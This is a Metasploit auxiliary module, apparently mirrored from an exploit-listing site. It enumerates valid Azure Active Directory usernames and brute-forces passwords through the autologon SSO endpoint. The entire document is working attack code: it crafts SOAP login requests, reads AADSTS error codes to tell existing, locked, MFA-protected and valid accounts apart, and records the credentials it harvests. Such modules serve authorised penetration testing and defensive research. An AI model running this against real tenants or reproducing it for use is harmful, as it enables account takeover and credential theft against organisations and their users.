## https://sploitus.com/exploit?id=PACKETSTORM:181129
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Microsoft Azure Active Directory Login Enumeration',
'Description' => %q{
This module enumerates valid usernames and passwords against a
Microsoft Azure Active Directory domain by utilizing a flaw in
how SSO authenticates.
},
'Author' => [
'Matthew Dunn - k0pak4'
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://raxis.com/blog/metasploit-azure-ad-login'],
[ 'URL', 'https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/'],
[ 'URL', 'https://github.com/treebuilder/aad-sso-enum-brute-spray'],
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'RHOST' => 'autologon.microsoftazuread-sso.com',
'PASSWORD' => 'password'
}
)
register_options(
[
OptString.new('RHOST', [true, 'The target Azure endpoint', 'autologon.microsoftazuread-sso.com']),
OptString.new('DOMAIN', [true, 'The target Azure AD domain']),
OptString.new('TARGETURI', [ true, 'The base path to the Azure autologon endpoint', '/winauth/trust/2005/usernamemixed']),
]
)
deregister_options('VHOST', 'USER_AS_PASS',
'USERPASS_FILE', 'STOP_ON_SUCCESS', 'Proxies',
'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS',
'BLANK_PASSWORDS', 'RHOSTS')
end
def report_login(address, domain, username, password)
# report information, if needed
service_data = service_details.merge({
address: address,
service_name: 'Azure AD',
workspace_id: myworkspace_id
})
credential_data = {
origin_type: :service,
module_fullname: fullname,
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: domain,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def check_login(targeturi, domain, username, password)
request_id = SecureRandom.uuid
url = "https://#{rhost}/#{domain}#{targeturi}"
created = Time.new.inspect
expires = (Time.new + 600).inspect
message_id = SecureRandom.uuid
username_token = SecureRandom.uuid
body = "<?xml version='1.0' encoding='UTF-8'?>
<s:Envelope xmlns:s='http://www.w3.org/2003/05/soap-envelope' xmlns:wsse='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd' xmlns:saml='urn:oasis:names:tc:SAML:1.0:assertion' xmlns:wsp='http://schemas.xmlsoap.org/ws/2004/09/policy' xmlns:wsu='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd' xmlns:wsa='http://www.w3.org/2005/08/addressing' xmlns:wssc='http://schemas.xmlsoap.org/ws/2005/02/sc' xmlns:wst='http://schemas.xmlsoap.org/ws/2005/02/trust' xmlns:ic='http://schemas.xmlsoap.org/ws/2005/05/identity'>
<s:Header>
<wsa:Action s:mustUnderstand='1'>http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue</wsa:Action>
<wsa:To s:mustUnderstand='1'>#{url}</wsa:To>
<wsa:MessageID>urn:uuid:#{message_id}</wsa:MessageID>
<wsse:Security s:mustUnderstand=\"1\">
<wsu:Timestamp wsu:Id=\"_0\">
<wsu:Created>#{created}</wsu:Created>
<wsu:Expires>#{expires}</wsu:Expires>
</wsu:Timestamp>
<wsse:UsernameToken wsu:Id=\"#{username_token}\">
<wsse:Username>#{username.strip.encode(xml: :text)}@#{domain}</wsse:Username>
<wsse:Password>#{password.strip.encode(xml: :text)}</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</s:Header>
<s:Body>
<wst:RequestSecurityToken Id='RST0'>
<wst:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</wst:RequestType>
<wsp:AppliesTo>
<wsa:EndpointReference>
<wsa:Address>urn:federation:MicrosoftOnline</wsa:Address>
</wsa:EndpointReference>
</wsp:AppliesTo>
<wst:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</wst:KeyType>
</wst:RequestSecurityToken>
</s:Body>
</s:Envelope>"
res = send_request_raw({
'uri' => "/#{domain}#{targeturi}",
'method' => 'POST',
'vars_get' => {
'client-request-id' => request_id
},
'data' => body
})
unless res
fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
end
@target_host ||= report_host(host: rhost, name: rhost, state: Msf::HostState::Alive)
# Check the XML response for either the SSO Token or the error code
xml = res.get_xml_document
xml.remove_namespaces!
if xml.xpath('//DesktopSsoToken')[0]
auth_details = xml.xpath('//DesktopSsoToken')[0].text
else
auth_details = xml.xpath('//internalerror/text')[0].text
end
if xml.xpath('//DesktopSsoToken')[0]
print_good("Login #{domain}\\#{username}:#{password} is valid!")
print_good("Desktop SSO Token: #{auth_details}")
report_login(@target_host.address, domain, username, password)
:next_user
elsif auth_details.start_with?('AADSTS50126') # Valid user but incorrect password
print_good("Password #{password} is invalid but #{domain}\\#{username} is valid!")
report_login(@target_host.address, domain, username, nil)
elsif auth_details.start_with?('AADSTS50056') # User exists without a password in Azure AD
print_good("#{domain}\\#{username} is valid but the user does not have a password in Azure AD!")
report_login(@target_host.address, domain, username, nil)
:next_user
elsif auth_details.start_with?('AADSTS50076') # User exists, but you need MFA to connect to this resource
print_good("Login #{domain}\\#{username}:#{password} is valid, but you need MFA to connect to this resource")
report_login(@target_host.address, domain, username, password)
:next_user
elsif auth_details.start_with?('AADSTS50014') # User exists, but the maximum Pass-through Authentication time was exceeded
print_good("#{domain}\\#{username} is valid but the maximum pass-through authentication time was exceeded")
report_login(@target_host.address, domain, username, nil)
elsif auth_details.start_with?('AADSTS50034') # User does not exist
print_error("#{domain}\\#{username} is not a valid user")
elsif auth_details.start_with?('AADSTS50053') # Account is locked
print_error("#{domain}\\#{username} is locked, consider taking time before continuing to scan!")
:next_user
elsif auth_details.start_with?('AADSTS50057') # User exists, but is disabled so we don't report
print_error("#{domain}\\#{username} exists but is disabled; it will not be reported")
:next_user
else # Unknown error code
print_error("Received unknown response with error code: #{auth_details}")
end
end
def run
each_user_pass do |cur_user, cur_pass|
check_login(datastore['TARGETURI'], datastore['DOMAIN'], cur_user, cur_pass)
end
end
end